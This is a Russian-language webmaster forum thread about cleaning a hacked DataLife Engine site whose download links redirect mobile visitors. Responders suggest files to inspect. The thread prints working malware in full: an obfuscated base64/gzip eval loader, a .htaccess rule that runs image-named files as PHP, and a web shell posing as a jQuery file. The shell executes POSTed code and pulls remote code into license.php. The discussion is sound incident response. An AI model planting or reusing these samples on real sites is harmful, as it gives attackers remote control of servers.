В dle встроили вредоносный код, нужна помощь.

Question

В dle встроили вредоносный код, нужна помощь.

Недавно я писал про то что получил фильтр https://pr-cy.ru/qa/question/40567, сегодня написал повторно в яндекс, сказали что проблема осталась. Так вот я определил что при нажатии скачать идет редирект для мобильных пользователей на подписки. Код не нашел. В каких файлах его можно найти ?

Кнопка скачать идет через пример: /?do=download&id=14206 редирект идет вначале на этот сайт http://w3-org.cc/ и далее

Вообщем кто сможет помочь советом где копать..

0

Ответы на пост (17) Написать ответ

Быстрая регистрация для ответа Войти

vasyev1

96

12.05.2020 12:29

Посмотрите в engine.php

0

TOPMUZLO

71

12.05.2020 12:56

нашел левый код в /engine/classes/mysql.php вот в блокнот запостил - https://shrib.com/#BaleenWhale2lDxRQL кто расшифрует ?

0

TOPMUZLO

71

12.05.2020 13:08

но удаление этой фигни мне пока никак не помогло все равно редирект идет

0

TOPMUZLO

71

12.05.2020 13:15

почистил /engine/cache вроде бы пока нет симптомов. еще почекаю

0

skapunker

6

12.05.2020 16:59

Если сам не можешь найти малварь, попробуй Virusdie.

0

TOPMUZLO

71

12.05.2020 17:09

выше написал - нашел левый код в /engine/classes/mysql.php вот в блокнот запостил - https://shrib.com/#BaleenWhale2lDxRQL

0

TOPMUZLO

71

12.05.2020 17:47

результат тот же. код удален но переходы идут. ищу

0

Павел Илонов

132

12.05.2020 18:21

htacess проверье
базу данных скачайте на ПК
showfull
showshort
dbconfig
main php
и main tpl (код иногда не видно в экране прокрутите левее)
и другие tpl, наверное паблик шаблон скачали или нуленую дле

еще можно скачать весь сайт с БД и проверить утилитой от доктор веба cureit или другими антивирусами (не Авастом только)
поставьте 444 на htacess главный

0

Павел Илонов

132

12.05.2020 18:25

на будущее качайте с официального сайта DLE, а шаблоны натягивайте сами (за 2 дня научитесь) любой html шаблон сделать ДЛЕ шабом

0

LoginIP

26

12.05.2020 18:58

в файле function.php посмотри GET переменные будут

0

TOPMUZLO

71

12.05.2020 20:48

Вообщем код находился в 2х файлах:

/engine/classes/mysql.php
/engine/data/dbconfig.php

Я так понимаю я пароль подарил кому-то. С шаблонами проблем нет, они покупные.

0

LoginIP

26

12.05.2020 21:14

htaccess файлы в папках uploads проверь еще, шеллы могут быть с форматом pnQ jpQ и т.д

0

TOPMUZLO

71

12.05.2020 21:31

Вроде все впорядке. Ничего подозрительного не нашел там.

0

TOPMUZLO

71

12.05.2020 21:33

Левый Код:

$liciens = "@Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eF6VVHtv2zYQ/yoOYIQS4sgP2bEdQ2jWwtiCDe2WJiuG1hAo6SyxkkiVDztB6e++oxwsceF52B+84+OeP95dN5EQkZh0AhIb5RjI9uAIy8hiW7AKvHAwn1864jcSNl63EKq3J0ayXleu/QVbe0wp0F43fvfhw6+3y89dtL3y/e83eJsKUTLw3FXvUOBi2NOsBs+/mE3mk2mP9Im/2KE17+ZQMIrIfDSeDsLZkPhC/uvzdHb6eX7yeTYgR0ImV+P5aDCeTa7C+WSMZDYPB5PZ+Go8C+djciSDroR1hE4+Lu/+XN59Vlo64JBpYZoGpEeYNLFWYL4h4r6/WjgoX2mQu+UfD8uP9/HD3S1ZLW4c3NEpe1qJIm60Lp6tldtmXRpalZvHlG8Kk1TRcDqYYGT/EZgEjB3kiy1vPB5d4roIZ6PhpSP+m1Qo7/nzYf1PGfQcWv51rWNJeeb0eqPhIPQXBdAMbT97I+EblqdBU2tXZn3FCt13uzKFIm2v0jRwPJfCsctw2972r5tWQxeday5Yu6WtgviN+MjOFYi2fhF8ZJJujayApyLDj8QqdSINlbQGDTL60i3haStkhmp4UHBuZDREvSOgRK9ROUdYfrBOCq2b675Lw/0UUhT3/QU8Mr3YdY3KT4OuOeQ0lqDMqz/83z/VfcyrhjdfqfmmYGsaHREliOtN7+ylsn65v/89fsBT/NPPy/f3ZOUa4sQzNkfbM2fY/HlcU50WHuknlGXGpgiBRSQqsJ/Cd7FdVprecvspB22xBODRMhpTmRaWFkJYltfUvhXaNgzrwdI6QcW/6FsptlaIHA8JPtaUVUGfkZ7Dzcd+xAQOfLeWg72ctKIMpLGbMkjF3khgM5OWblklcmGsKoCjY043zqmognTvWtot01gKlnGlaY5RcXfap2a0SQBpkDzt4xYZF6U1lcjtmqaQiMAqaHN7cslhPIqjZVWzkZVJGtiE8XyfB9Zem8VhGk2QYOIKPaqnOhHK8kwKltmaZY0FyUB96VwNbKHT2IoEB7H9OqrBoiyjHKU4s00hOLxA5bru7Ic5TLIKcLhjneBAXx2XeZ7V7dNBiBHNMg5bZbEBcqYcOtEaIEsoghtVDl1tkTEeNEVjaVa/3qGCpJoJvo9Qsr0Lt+ucRR03KY8M2+dBPT02V3e73d+Pxjob')));";$release_this = "cre"."ate_"."function";@$dle_func = $release_this('', "$liciens;");$dle_func('');

1

STavTerier

0

16.05.2020 14:35

Привет, решил проблему? Могу помочь и глянуть что у тебя там. Сам недавно на этом попался

0

TOPMUZLO

71

16.05.2020 17:00

Решил. Нашел код в этих файлах /engine/classes/mysql.php и
/engine/data/dbconfig.php. Сменил пароли

0

Быстрая регистрация для ответа Войти

Accepted Answer

После очередного появления кода опять начал искать. и нашел

в /uploads/fotos файл .htaccess в котором

<filesmatch ".([pp][hh][pp]|[cc][gg][ii]|[pp][ll]|[pp][hh][ii][mm][ll]).?"="">
   Order allow,deny
   Deny from all
</filesmatch>
AddHandler application/x-httpd-php .avi .jpeq .mpg

и рядом файл foto_67823364.jpeq с кодом

<?php 
/*
 * jQuery Image Library v1.6.1
 * <a href="https://pr-cy.ru/jump/?url=http%3A%2F%2Fjquery.com%2F" target="_blank" class="redactor-autoparser-object">http://jquery.com/</a>
 *
 * Copyright 2011, John Resig
 * Dual licensed under the MIT or GPL Version 2 licenses.
 * <a href="https://pr-cy.ru/jump/?url=http%3A%2F%2Fjquery.org%2Flicense" target="_blank" class="redactor-autoparser-object">http://jquery.org/license</a>
 *
 * Includes Sizzle.js
 * <a href="https://pr-cy.ru/jump/?url=http%3A%2F%2Fsizzlejs.com%2F" target="_blank" class="redactor-autoparser-object">http://sizzlejs.com/</a>
 * Copyright 2011, The Dojo Foundation
 * Released under the MIT, BSD, and GPL Licenses.
 *
 * Date: Thu May 12 15:04:36 2011 -0400
 *  *  *  *  *  *  * *  *  *  *  *  *  *  *  *  *  *  *  *  Don't delete this file *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  * 
 */
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('display_errors', 0);
@error_reporting(0);
@set_time_limit(0);
$cret='unct' .'ion';$cret= 'cre' . 'ate' .'_f' .$cret;
$jQuery='sert';$jQuery='as'.$jQuery;$Libr= "_ostp";
$sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3] );
if(isset(${$sizz}['j01bt5ri3p'])){@$cret('', '};'.${$sizz}['j01bt5ri3p'].'{');}
if(isset(${$sizz}['j01bt5ri3p'])){@$jQuery(${$sizz}['j01bt5ri3p']);} 
if((isset(${$sizz}['j01bt5ri3p']))&(isset(${$sizz}['fail']))){
@copy('http://'.${$sizz}['fail'].'/test.txt', $_SERVER['DOCUMENT_ROOT'].'/license.php');} 
print"<!-- te"."st --> "; 
?>

В dle встроили вредоносный код, нужна помощь.

Похожие посты

Анализ сайта